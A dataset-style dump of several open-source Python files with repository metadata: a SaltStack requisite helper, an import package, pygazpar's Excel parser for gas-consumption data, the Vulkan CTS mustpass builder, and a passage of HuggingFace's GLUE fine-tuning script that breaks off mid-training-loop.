            'Failed to set {0}\'{1}\' to {2}: {3}'.format(
                'global key ' if global_ else '',
                name,
                value_comment,
                _strip_exc(exc)
            )
        )

    if pre != post:
        ret['changes'][name] = {'old': pre, 'new': post}

    if post != desired:
        return _fail(
            ret,
            'Failed to set {0}\'{1}\' to {2}'.format(
                'global key ' if global_ else '',
                name,
                value_comment
            )
        )

    ret['comment'] = '{0}\'{1}\' was {2} {3}'.format(
        'Global key ' if global_ else '',
        name,
        'added as' if pre is None else 'set to',
        value_comment
    )
    return ret
def mod_run_check(cmd_kwargs, onlyif, unless):
    '''
    Evaluate the ``onlyif`` and ``unless`` requisites.

    Return a result dict (with ``skip_watch`` set) when:

    * ``onlyif`` failed (nonzero return code)
    * ``unless`` succeeded (zero return code)

    Otherwise, return ``True`` to signal that the state should run.
    '''
    # Work on a copy so the caller's kwargs dict is never mutated.
    run_kwargs = copy.deepcopy(cmd_kwargs)
    run_kwargs['python_shell'] = True

    if onlyif and __salt__['cmd.retcode'](onlyif, **run_kwargs) != 0:
        return {'comment': 'onlyif execution failed',
                'skip_watch': True,
                'result': True}

    if unless and __salt__['cmd.retcode'](unless, **run_kwargs) == 0:
        return {'comment': 'unless execution succeeded',
                'skip_watch': True,
                'result': True}

    # No reason to stop, return True
    return True
| 38.790061
| 112
| 0.466843
|
4a022ca98d5379cda977460141b61b06616cd665
| 297
|
py
|
Python
|
conversion/__init__.py
|
kallyas/PythonAlgorithms
|
e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80
|
[
"MIT"
] | 1
|
2022-02-23T19:22:44.000Z
|
2022-02-23T19:22:44.000Z
|
conversion/__init__.py
|
kallyas/PythonAlgorithms
|
e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80
|
[
"MIT"
] | null | null | null |
conversion/__init__.py
|
kallyas/PythonAlgorithms
|
e9b4c8dddad101ef0ff4bd4786d506f34f6f4d80
|
[
"MIT"
] | null | null | null |
from .binary_to_decimal import binary_to_decimal
from .decimal_to_binary import decimal_to_binary
from .hexa_decimal_to_decimal import hexa_decimal_to_decimal
from .decimal_to_hexa import decimal_to_hexa
from .octal_to_decimal import octal_to_decimal
from .decimal_to_octal import decimal_to_octal
| 49.5
| 60
| 0.902357
|
4a022d98f1327fb09e40d480dceac2346563f08e
| 6,007
|
py
|
Python
|
pygazpar/datafileparser.py
|
LudovicRousseau/PyGazpar
|
ca1dd1c7a099a9722cdd98e24b4f8c30e2efcaa8
|
[
"MIT"
] | null | null | null |
pygazpar/datafileparser.py
|
LudovicRousseau/PyGazpar
|
ca1dd1c7a099a9722cdd98e24b4f8c30e2efcaa8
|
[
"MIT"
] | null | null | null |
pygazpar/datafileparser.py
|
LudovicRousseau/PyGazpar
|
ca1dd1c7a099a9722cdd98e24b4f8c30e2efcaa8
|
[
"MIT"
] | null | null | null |
import logging
from datetime import datetime
from pygazpar.enum import Frequency
from pygazpar.enum import PropertyName
from openpyxl.worksheet.worksheet import Worksheet
from openpyxl.cell.cell import Cell
from openpyxl import load_workbook
FIRST_DATA_LINE_NUMBER = 10
# ------------------------------------------------------------------------------------------------------------
class DataFileParser:
    """Parse GrDF Excel data files into lists of row dictionaries.

    Each returned row maps ``PropertyName`` values to the cell contents of one
    worksheet line, plus a ``TIMESTAMP`` recording when the file was parsed.
    """

    logger = logging.getLogger(__name__)

    # Worksheet column layouts: (column index, target property, parse as number).
    # Column 2 (B) is the time period and also marks whether a row holds data.
    __DAILY_COLUMNS = [
        (2, PropertyName.TIME_PERIOD.value, False),
        (3, PropertyName.START_INDEX.value, True),
        (4, PropertyName.END_INDEX.value, True),
        (5, PropertyName.VOLUME.value, True),
        (6, PropertyName.ENERGY.value, True),
        (7, PropertyName.CONVERTER_FACTOR.value, True),
        (8, PropertyName.TEMPERATURE.value, True),
        (9, PropertyName.TYPE.value, False),
    ]

    __WEEKLY_MONTHLY_COLUMNS = [
        (2, PropertyName.TIME_PERIOD.value, False),
        (3, PropertyName.VOLUME.value, True),
        (4, PropertyName.ENERGY.value, True),
    ]

    # ------------------------------------------------------
    @staticmethod
    def parse(dataFilename: str, dataReadingFrequency: Frequency) -> list:
        """Load the Excel file and parse its active worksheet.

        :param dataFilename: path to the .xlsx file downloaded from GrDF.
        :param dataReadingFrequency: granularity of the data in the file.
        :return: list of row dicts (empty for HOURLY, which is not supported).
        """
        parseByFrequency = {
            Frequency.HOURLY: DataFileParser.__parseHourly,
            Frequency.DAILY: DataFileParser.__parseDaily,
            Frequency.WEEKLY: DataFileParser.__parseWeekly,
            Frequency.MONTHLY: DataFileParser.__parseMonthly
        }

        DataFileParser.logger.debug(f"Loading Excel data file '{dataFilename}'...")
        workbook = load_workbook(filename=dataFilename)

        # The workbook ships with a single active sheet per frequency.
        worksheet = workbook.active

        res = parseByFrequency[dataReadingFrequency](worksheet)

        workbook.close()
        return res

    # ------------------------------------------------------
    @staticmethod
    def __fillRow(row: dict, propertyName: str, cell: Cell, isNumber: bool):
        """Store the cell value in *row* under *propertyName*.

        Numeric cells arriving as strings use ',' as the decimal separator
        (French locale) and are converted to float; empty strings are skipped.
        """
        if cell.value is not None:
            if isNumber:
                if type(cell.value) is str:
                    if len(cell.value.strip()) > 0:
                        row[propertyName] = float(cell.value.replace(',', '.'))
                else:
                    row[propertyName] = float(cell.value)
            else:
                row[propertyName] = cell.value

    # ------------------------------------------------------
    @staticmethod
    def __parseWorksheet(worksheet: Worksheet, columns: list, frequencyLabel: str) -> list:
        """Shared scanning loop for all supported frequencies.

        Walks rows from FIRST_DATA_LINE_NUMBER to the last populated row of
        column B, extracting the properties described by *columns*.
        """
        res = []

        # Timestamp of the data (one snapshot time for the whole file).
        data_timestamp = datetime.now().isoformat()

        minRowNum = FIRST_DATA_LINE_NUMBER
        maxRowNum = len(worksheet['B'])

        for rownum in range(minRowNum, maxRowNum + 1):
            # An empty column B means the row carries no data.
            if worksheet.cell(column=2, row=rownum).value is None:
                continue
            row = {}
            for columnIndex, propertyName, isNumber in columns:
                DataFileParser.__fillRow(row, propertyName, worksheet.cell(column=columnIndex, row=rownum), isNumber)
            row[PropertyName.TIMESTAMP.value] = data_timestamp
            res.append(row)

        DataFileParser.logger.debug(f"{frequencyLabel} data read successfully between row #{minRowNum} and row #{maxRowNum}")

        return res

    # ------------------------------------------------------
    @staticmethod
    def __parseHourly(worksheet: Worksheet) -> list:
        # Hourly data is not available in the downloaded files.
        return []

    # ------------------------------------------------------
    @staticmethod
    def __parseDaily(worksheet: Worksheet) -> list:
        return DataFileParser.__parseWorksheet(worksheet, DataFileParser.__DAILY_COLUMNS, "Daily")

    # ------------------------------------------------------
    @staticmethod
    def __parseWeekly(worksheet: Worksheet) -> list:
        return DataFileParser.__parseWorksheet(worksheet, DataFileParser.__WEEKLY_MONTHLY_COLUMNS, "Weekly")

    # ------------------------------------------------------
    @staticmethod
    def __parseMonthly(worksheet: Worksheet) -> list:
        return DataFileParser.__parseWorksheet(worksheet, DataFileParser.__WEEKLY_MONTHLY_COLUMNS, "Monthly")
| 41.715278
| 126
| 0.598302
|
4a022d9e4e9845f40023e032d5862089a37cdd41
| 4,775
|
py
|
Python
|
external/vulkancts/scripts/build_mustpass.py
|
paulthomson/VK-GL-CTS
|
08de4618d38fb95b48a2bd8812f2e3d96f620df3
|
[
"Apache-2.0"
] | 2
|
2019-04-04T12:53:11.000Z
|
2020-09-01T15:27:15.000Z
|
external/vulkancts/scripts/build_mustpass.py
|
paulthomson/VK-GL-CTS
|
08de4618d38fb95b48a2bd8812f2e3d96f620df3
|
[
"Apache-2.0"
] | null | null | null |
external/vulkancts/scripts/build_mustpass.py
|
paulthomson/VK-GL-CTS
|
08de4618d38fb95b48a2bd8812f2e3d96f620df3
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# Vulkan CTS
# ----------
#
# Copyright (c) 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", "..", "..", "scripts"))
from build.common import DEQP_DIR
from build.config import ANY_GENERATOR
from build_caselists import Module, getModuleByName, getBuildConfig, DEFAULT_BUILD_DIR, DEFAULT_TARGET
from mustpass import Project, Package, Mustpass, Configuration, include, exclude, genMustpassLists, parseBuildConfigFromCmdLineArgs
# License text embedded at the top of every generated mustpass file.
COPYRIGHT_DECLARATION = """
     Licensed under the Apache License, Version 2.0 (the "License");
     you may not use this file except in compliance with the License.
     You may obtain a copy of the License at
          http://www.apache.org/licenses/LICENSE-2.0
     Unless required by applicable law or agreed to in writing, software
     distributed under the License is distributed on an "AS IS" BASIS,
     WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     See the License for the specific language governing permissions and
     limitations under the License.
     """

# Output location for the generated mustpass lists within the CTS tree.
MUSTPASS_PATH = os.path.join(DEQP_DIR, "external", "vulkancts", "mustpass")
PROJECT = Project(path = MUSTPASS_PATH, copyright = COPYRIGHT_DECLARATION)
# Test module and build configuration used when generating the case lists.
VULKAN_MODULE = getModuleByName("dEQP-VK")
BUILD_CONFIG = getBuildConfig(DEFAULT_BUILD_DIR, DEFAULT_TARGET, "Debug")

# One Package per released mustpass version. Each Configuration composes
# filter files (include/exclude) found under MUSTPASS_PATH/<version>/src.

# 1.0.0
VULKAN_1_0_0_PKG = Package(module = VULKAN_MODULE, configurations = [
    # Master
    Configuration(name = "default",
                  filters = [include("master.txt")]),
])

# 1.0.1
VULKAN_1_0_1_PKG = Package(module = VULKAN_MODULE, configurations = [
    # Master
    Configuration(name = "default",
                  filters = [include("master.txt")]),
])

# 1.0.2
VULKAN_1_0_2_PKG = Package(module = VULKAN_MODULE, configurations = [
    # Master
    Configuration(name = "default",
                  filters = [include("master.txt")]),
])

# 1.1.0 onward additionally carries a "default-no-waivers" configuration that
# keeps the tests excluded by waivers.txt in the default list.

# 1.1.0
VULKAN_1_1_0_PKG = Package(module = VULKAN_MODULE, configurations = [
    # Master
    Configuration(name = "default",
                  filters = [include("master.txt"),
                             exclude("waivers.txt")]),
    Configuration(name = "default-no-waivers",
                  filters = [include("master.txt")]),
])

# 1.1.1
VULKAN_1_1_1_PKG = Package(module = VULKAN_MODULE, configurations = [
    # Master
    Configuration(name = "default",
                  filters = [include("master.txt"),
                             exclude("waivers.txt")]),
    Configuration(name = "default-no-waivers",
                  filters = [include("master.txt")]),
])

# 1.1.2
VULKAN_1_1_2_PKG = Package(module = VULKAN_MODULE, configurations = [
    # Master
    Configuration(name = "default",
                  filters = [include("master.txt"),
                             exclude("waivers.txt")]),
    Configuration(name = "default-no-waivers",
                  filters = [include("master.txt")]),
])

# 1.1.3 (work-in-progress list: excludes known test issues and Android-only
# exclusions in addition to the waivers)
VULKAN_1_1_3_PKG = Package(module = VULKAN_MODULE, configurations = [
    # Master
    Configuration(name = "default",
                  filters = [include("master.txt"),
                             exclude("test-issues.txt"),
                             exclude("excluded-tests.txt"),
                             exclude("android-tests.txt"),
                             exclude("waivers.txt")]),
    Configuration(name = "default-no-waivers",
                  filters = [include("master.txt"),
                             exclude("test-issues.txt"),
                             exclude("excluded-tests.txt"),
                             exclude("android-tests.txt")]),
])

# All mustpass versions that genMustpassLists will (re)generate.
MUSTPASS_LISTS = [
    Mustpass(project = PROJECT, version = "1.0.0", packages = [VULKAN_1_0_0_PKG]),
    Mustpass(project = PROJECT, version = "1.0.1", packages = [VULKAN_1_0_1_PKG]),
    Mustpass(project = PROJECT, version = "1.0.2", packages = [VULKAN_1_0_2_PKG]),
    Mustpass(project = PROJECT, version = "1.1.0", packages = [VULKAN_1_1_0_PKG]),
    Mustpass(project = PROJECT, version = "1.1.1", packages = [VULKAN_1_1_1_PKG]),
    Mustpass(project = PROJECT, version = "1.1.2", packages = [VULKAN_1_1_2_PKG]),
    Mustpass(project = PROJECT, version = "1.1.3", packages = [VULKAN_1_1_3_PKG]),
]

if __name__ == "__main__":
    genMustpassLists(MUSTPASS_LISTS, ANY_GENERATOR, parseBuildConfigFromCmdLineArgs())
| 34.107143
| 131
| 0.659267
|
4a022db69cd54635b4a0ee777c028f0db9143751
| 27,890
|
py
|
Python
|
examples/pytorch/text-classification/run_glue_no_trainer.py
|
shangz-ai/transformers
|
75259b44bf2e2b98b5a4d431fb400b7190342a01
|
[
"Apache-2.0"
] | null | null | null |
examples/pytorch/text-classification/run_glue_no_trainer.py
|
shangz-ai/transformers
|
75259b44bf2e2b98b5a4d431fb400b7190342a01
|
[
"Apache-2.0"
] | null | null | null |
examples/pytorch/text-classification/run_glue_no_trainer.py
|
shangz-ai/transformers
|
75259b44bf2e2b98b5a4d431fb400b7190342a01
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning a 🤗 Transformers model for sequence classification on GLUE."""
import argparse
import json
import logging
import math
import os
import random
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, load_metric
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
import transformers
from accelerate import Accelerator
from accelerate.logging import get_logger
from accelerate.utils import set_seed
from huggingface_hub import Repository
from transformers import (
AutoConfig,
AutoModelForSequenceClassification,
AutoTokenizer,
DataCollatorWithPadding,
PretrainedConfig,
SchedulerType,
default_data_collator,
get_scheduler,
)
from transformers.utils import get_full_repo_name, send_example_telemetry
from transformers.utils.versions import require_version
logger = get_logger(__name__)
require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/text-classification/requirements.txt")
# Maps each GLUE task name to the dataset column(s) holding its input text.
# The second element is None for single-sentence tasks.
task_to_keys = {
    "cola": ("sentence", None),
    "mnli": ("premise", "hypothesis"),
    "mrpc": ("sentence1", "sentence2"),
    "qnli": ("question", "sentence"),
    "qqp": ("question1", "question2"),
    "rte": ("sentence1", "sentence2"),
    "sst2": ("sentence", None),
    "stsb": ("sentence1", "sentence2"),
    "wnli": ("sentence1", "sentence2"),
}
def parse_args():
    """Parse and validate the command-line arguments for GLUE fine-tuning.

    Returns the parsed ``argparse.Namespace``. Raises ``ValueError`` when
    neither a GLUE task name nor training/validation files are provided, and
    asserts that provided data files are CSV or JSON.
    """
    parser = argparse.ArgumentParser(description="Finetune a transformers model on a text classification task")
    parser.add_argument(
        "--task_name",
        type=str,
        default=None,
        help="The name of the glue task to train on.",
        choices=list(task_to_keys.keys()),
    )
    parser.add_argument(
        "--train_file", type=str, default=None, help="A csv or a json file containing the training data."
    )
    parser.add_argument(
        "--validation_file", type=str, default=None, help="A csv or a json file containing the validation data."
    )
    parser.add_argument(
        "--max_length",
        type=int,
        default=128,
        help=(
            "The maximum total input sequence length after tokenization. Sequences longer than this will be truncated,"
            # Fixed typo: the flag is --pad_to_max_length.
            " sequences shorter will be padded if `--pad_to_max_length` is passed."
        ),
    )
    parser.add_argument(
        "--pad_to_max_length",
        action="store_true",
        help="If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.",
    )
    parser.add_argument(
        "--model_name_or_path",
        type=str,
        help="Path to pretrained model or model identifier from huggingface.co/models.",
        required=True,
    )
    parser.add_argument(
        "--use_slow_tokenizer",
        action="store_true",
        help="If passed, will use a slow tokenizer (not backed by the 🤗 Tokenizers library).",
    )
    parser.add_argument(
        "--per_device_train_batch_size",
        type=int,
        default=8,
        help="Batch size (per device) for the training dataloader.",
    )
    parser.add_argument(
        "--per_device_eval_batch_size",
        type=int,
        default=8,
        help="Batch size (per device) for the evaluation dataloader.",
    )
    parser.add_argument(
        "--learning_rate",
        type=float,
        default=5e-5,
        help="Initial learning rate (after the potential warmup period) to use.",
    )
    parser.add_argument("--weight_decay", type=float, default=0.0, help="Weight decay to use.")
    parser.add_argument("--num_train_epochs", type=int, default=3, help="Total number of training epochs to perform.")
    parser.add_argument(
        "--max_train_steps",
        type=int,
        default=None,
        help="Total number of training steps to perform. If provided, overrides num_train_epochs.",
    )
    parser.add_argument(
        "--gradient_accumulation_steps",
        type=int,
        default=1,
        help="Number of updates steps to accumulate before performing a backward/update pass.",
    )
    parser.add_argument(
        "--lr_scheduler_type",
        type=SchedulerType,
        default="linear",
        help="The scheduler type to use.",
        choices=["linear", "cosine", "cosine_with_restarts", "polynomial", "constant", "constant_with_warmup"],
    )
    parser.add_argument(
        "--num_warmup_steps", type=int, default=0, help="Number of steps for the warmup in the lr scheduler."
    )
    parser.add_argument("--output_dir", type=str, default=None, help="Where to store the final model.")
    parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.")
    parser.add_argument("--push_to_hub", action="store_true", help="Whether or not to push the model to the Hub.")
    parser.add_argument(
        "--hub_model_id", type=str, help="The name of the repository to keep in sync with the local `output_dir`."
    )
    parser.add_argument("--hub_token", type=str, help="The token to use to push to the Model Hub.")
    parser.add_argument(
        "--checkpointing_steps",
        type=str,
        default=None,
        help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.",
    )
    parser.add_argument(
        "--resume_from_checkpoint",
        type=str,
        default=None,
        help="If the training should continue from a checkpoint folder.",
    )
    parser.add_argument(
        "--with_tracking",
        action="store_true",
        help="Whether to enable experiment trackers for logging.",
    )
    parser.add_argument(
        "--report_to",
        type=str,
        default="all",
        help=(
            'The integration to report the results and logs to. Supported platforms are `"tensorboard"`,'
            ' `"wandb"` and `"comet_ml"`. Use `"all"` (default) to report to all integrations.'
            # Leading space added so the concatenated help text doesn't read
            # "integrations.Only applicable".
            " Only applicable when `--with_tracking` is passed."
        ),
    )
    parser.add_argument(
        "--ignore_mismatched_sizes",
        action="store_true",
        help="Whether or not to enable to load a pretrained model whose head dimensions are different.",
    )
    args = parser.parse_args()

    # Sanity checks
    if args.task_name is None and args.train_file is None and args.validation_file is None:
        raise ValueError("Need either a task name or a training/validation file.")
    else:
        if args.train_file is not None:
            extension = args.train_file.split(".")[-1]
            assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
        if args.validation_file is not None:
            extension = args.validation_file.split(".")[-1]
            assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."

    if args.push_to_hub:
        assert args.output_dir is not None, "Need an `output_dir` to create a repo when `--push_to_hub` is passed."

    return args
def main():
args = parse_args()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_glue_no_trainer", args)
# Initialize the accelerator. We will let the accelerator handle device placement for us in this example.
# If we're using tracking, we also need to initialize it here and it will by default pick up all supported trackers
# in the environment
accelerator = (
Accelerator(log_with=args.report_to, logging_dir=args.output_dir) if args.with_tracking else Accelerator()
)
# Make one log on every process with the configuration for debugging.
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
logger.info(accelerator.state, main_process_only=False)
if accelerator.is_local_main_process:
datasets.utils.logging.set_verbosity_warning()
transformers.utils.logging.set_verbosity_info()
else:
datasets.utils.logging.set_verbosity_error()
transformers.utils.logging.set_verbosity_error()
# If passed along, set the training seed now.
if args.seed is not None:
set_seed(args.seed)
# Handle the repository creation
if accelerator.is_main_process:
if args.push_to_hub:
if args.hub_model_id is None:
repo_name = get_full_repo_name(Path(args.output_dir).name, token=args.hub_token)
else:
repo_name = args.hub_model_id
repo = Repository(args.output_dir, clone_from=repo_name)
with open(os.path.join(args.output_dir, ".gitignore"), "w+") as gitignore:
if "step_*" not in gitignore:
gitignore.write("step_*\n")
if "epoch_*" not in gitignore:
gitignore.write("epoch_*\n")
elif args.output_dir is not None:
os.makedirs(args.output_dir, exist_ok=True)
accelerator.wait_for_everyone()
# Get the datasets: you can either provide your own CSV/JSON training and evaluation files (see below)
# or specify a GLUE benchmark task (the dataset will be downloaded automatically from the datasets Hub).
# For CSV/JSON files, this script will use as labels the column called 'label' and as pair of sentences the
# sentences in columns called 'sentence1' and 'sentence2' if such column exists or the first two columns not named
# label if at least two columns are provided.
# If the CSVs/JSONs contain only one non-label column, the script does single sentence classification on this
# single column. You can easily tweak this behavior (see below)
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
if args.task_name is not None:
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset("glue", args.task_name)
else:
# Loading the dataset from local csv or json file.
data_files = {}
if args.train_file is not None:
data_files["train"] = args.train_file
if args.validation_file is not None:
data_files["validation"] = args.validation_file
extension = (args.train_file if args.train_file is not None else args.validation_file).split(".")[-1]
raw_datasets = load_dataset(extension, data_files=data_files)
# See more about loading any type of standard or custom dataset at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# Labels
if args.task_name is not None:
is_regression = args.task_name == "stsb"
if not is_regression:
label_list = raw_datasets["train"].features["label"].names
num_labels = len(label_list)
else:
num_labels = 1
else:
# Trying to have good defaults here, don't hesitate to tweak to your needs.
is_regression = raw_datasets["train"].features["label"].dtype in ["float32", "float64"]
if is_regression:
num_labels = 1
else:
# A useful fast method:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique
label_list = raw_datasets["train"].unique("label")
label_list.sort() # Let's sort it for determinism
num_labels = len(label_list)
# Load pretrained model and tokenizer
#
# In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(args.model_name_or_path, num_labels=num_labels, finetuning_task=args.task_name)
tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=not args.use_slow_tokenizer)
model = AutoModelForSequenceClassification.from_pretrained(
args.model_name_or_path,
from_tf=bool(".ckpt" in args.model_name_or_path),
config=config,
ignore_mismatched_sizes=args.ignore_mismatched_sizes,
)
# Preprocessing the datasets
if args.task_name is not None:
sentence1_key, sentence2_key = task_to_keys[args.task_name]
else:
# Again, we try to have some nice defaults but don't hesitate to tweak to your use case.
non_label_column_names = [name for name in raw_datasets["train"].column_names if name != "label"]
if "sentence1" in non_label_column_names and "sentence2" in non_label_column_names:
sentence1_key, sentence2_key = "sentence1", "sentence2"
else:
if len(non_label_column_names) >= 2:
sentence1_key, sentence2_key = non_label_column_names[:2]
else:
sentence1_key, sentence2_key = non_label_column_names[0], None
# Some models have set the order of the labels to use, so let's make sure we do use it.
label_to_id = None
if (
model.config.label2id != PretrainedConfig(num_labels=num_labels).label2id
and args.task_name is not None
and not is_regression
):
# Some have all caps in their config, some don't.
label_name_to_id = {k.lower(): v for k, v in model.config.label2id.items()}
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
logger.info(
f"The configuration of the model provided the following label correspondence: {label_name_to_id}. "
"Using it!"
)
label_to_id = {i: label_name_to_id[label_list[i]] for i in range(num_labels)}
else:
logger.warning(
"Your model seems to have been trained with labels, but they don't match the dataset: ",
f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels: {list(sorted(label_list))}."
"\nIgnoring the model labels as a result.",
)
elif args.task_name is None and not is_regression:
label_to_id = {v: i for i, v in enumerate(label_list)}
if label_to_id is not None:
model.config.label2id = label_to_id
model.config.id2label = {id: label for label, id in config.label2id.items()}
elif args.task_name is not None and not is_regression:
model.config.label2id = {l: i for i, l in enumerate(label_list)}
model.config.id2label = {id: label for label, id in config.label2id.items()}
padding = "max_length" if args.pad_to_max_length else False
def preprocess_function(examples):
# Tokenize the texts
texts = (
(examples[sentence1_key],) if sentence2_key is None else (examples[sentence1_key], examples[sentence2_key])
)
result = tokenizer(*texts, padding=padding, max_length=args.max_length, truncation=True)
if "label" in examples:
if label_to_id is not None:
# Map labels to IDs (not necessary for GLUE tasks)
result["labels"] = [label_to_id[l] for l in examples["label"]]
else:
# In all cases, rename the column to labels because the model will expect that.
result["labels"] = examples["label"]
return result
with accelerator.main_process_first():
processed_datasets = raw_datasets.map(
preprocess_function,
batched=True,
remove_columns=raw_datasets["train"].column_names,
desc="Running tokenizer on dataset",
)
train_dataset = processed_datasets["train"]
eval_dataset = processed_datasets["validation_matched" if args.task_name == "mnli" else "validation"]
# Log a few random samples from the training set:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
# DataLoaders creation:
if args.pad_to_max_length:
# If padding was already done ot max length, we use the default data collator that will just convert everything
# to tensors.
data_collator = default_data_collator
else:
# Otherwise, `DataCollatorWithPadding` will apply dynamic padding for us (by padding to the maximum length of
# the samples passed). When using mixed precision, we add `pad_to_multiple_of=8` to pad all tensors to multiple
# of 8s, which will enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta).
data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=(8 if accelerator.use_fp16 else None))
train_dataloader = DataLoader(
train_dataset, shuffle=True, collate_fn=data_collator, batch_size=args.per_device_train_batch_size
)
eval_dataloader = DataLoader(eval_dataset, collate_fn=data_collator, batch_size=args.per_device_eval_batch_size)
# Optimizer
# Split weights in two groups, one with weight decay and the other not.
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{
"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
},
]
optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.learning_rate)
# Scheduler and math around the number of training steps.
overrode_max_train_steps = False
num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
if args.max_train_steps is None:
args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
overrode_max_train_steps = True
lr_scheduler = get_scheduler(
name=args.lr_scheduler_type,
optimizer=optimizer,
num_warmup_steps=args.num_warmup_steps,
num_training_steps=args.max_train_steps,
)
# Prepare everything with our `accelerator`.
model, optimizer, train_dataloader, eval_dataloader, lr_scheduler = accelerator.prepare(
model, optimizer, train_dataloader, eval_dataloader, lr_scheduler
)
# We need to recalculate our total training steps as the size of the training dataloader may have changed
num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)
if overrode_max_train_steps:
args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch
# Afterwards we recalculate our number of training epochs
args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch)
# Figure out how many steps we should save the Accelerator states
if hasattr(args.checkpointing_steps, "isdigit"):
checkpointing_steps = args.checkpointing_steps
if args.checkpointing_steps.isdigit():
checkpointing_steps = int(args.checkpointing_steps)
else:
checkpointing_steps = None
# We need to initialize the trackers we use, and also store our configuration.
# We initialize the trackers only on main process because `accelerator.log`
# only logs on main process and we don't want empty logs/runs on other processes.
if args.with_tracking:
if accelerator.is_main_process:
experiment_config = vars(args)
# TensorBoard cannot log Enums, need the raw value
experiment_config["lr_scheduler_type"] = experiment_config["lr_scheduler_type"].value
accelerator.init_trackers("glue_no_trainer", experiment_config)
# Get the metric function
if args.task_name is not None:
metric = load_metric("glue", args.task_name)
else:
metric = load_metric("accuracy")
# Train!
total_batch_size = args.per_device_train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps
logger.info("***** Running training *****")
logger.info(f" Num examples = {len(train_dataset)}")
logger.info(f" Num Epochs = {args.num_train_epochs}")
logger.info(f" Instantaneous batch size per device = {args.per_device_train_batch_size}")
logger.info(f" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}")
logger.info(f" Gradient Accumulation steps = {args.gradient_accumulation_steps}")
logger.info(f" Total optimization steps = {args.max_train_steps}")
# Only show the progress bar once on each machine.
progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)
completed_steps = 0
starting_epoch = 0
# Potentially load in the weights and states from a previous save
if args.resume_from_checkpoint:
if args.resume_from_checkpoint is not None or args.resume_from_checkpoint != "":
accelerator.print(f"Resumed from checkpoint: {args.resume_from_checkpoint}")
accelerator.load_state(args.resume_from_checkpoint)
path = os.path.basename(args.resume_from_checkpoint)
else:
# Get the most recent checkpoint
dirs = [f.name for f in os.scandir(os.getcwd()) if f.is_dir()]
dirs.sort(key=os.path.getctime)
path = dirs[-1] # Sorts folders by date modified, most recent checkpoint is the last
# Extract `epoch_{i}` or `step_{i}`
training_difference = os.path.splitext(path)[0]
if "epoch" in training_difference:
starting_epoch = int(training_difference.replace("epoch_", "")) + 1
resume_step = None
else:
resume_step = int(training_difference.replace("step_", ""))
starting_epoch = resume_step // len(train_dataloader)
resume_step -= starting_epoch * len(train_dataloader)
for epoch in range(starting_epoch, args.num_train_epochs):
model.train()
if args.with_tracking:
total_loss = 0
for step, batch in enumerate(train_dataloader):
# We need to skip steps until we reach the resumed step
if args.resume_from_checkpoint and epoch == starting_epoch:
if resume_step is not None and step < resume_step:
completed_steps += 1
continue
outputs = model(**batch)
loss = outputs.loss
# We keep track of the loss at each epoch
if args.with_tracking:
total_loss += loss.detach().float()
loss = loss / args.gradient_accumulation_steps
accelerator.backward(loss)
if step % args.gradient_accumulation_steps == 0 or step == len(train_dataloader) - 1:
optimizer.step()
lr_scheduler.step()
optimizer.zero_grad()
progress_bar.update(1)
completed_steps += 1
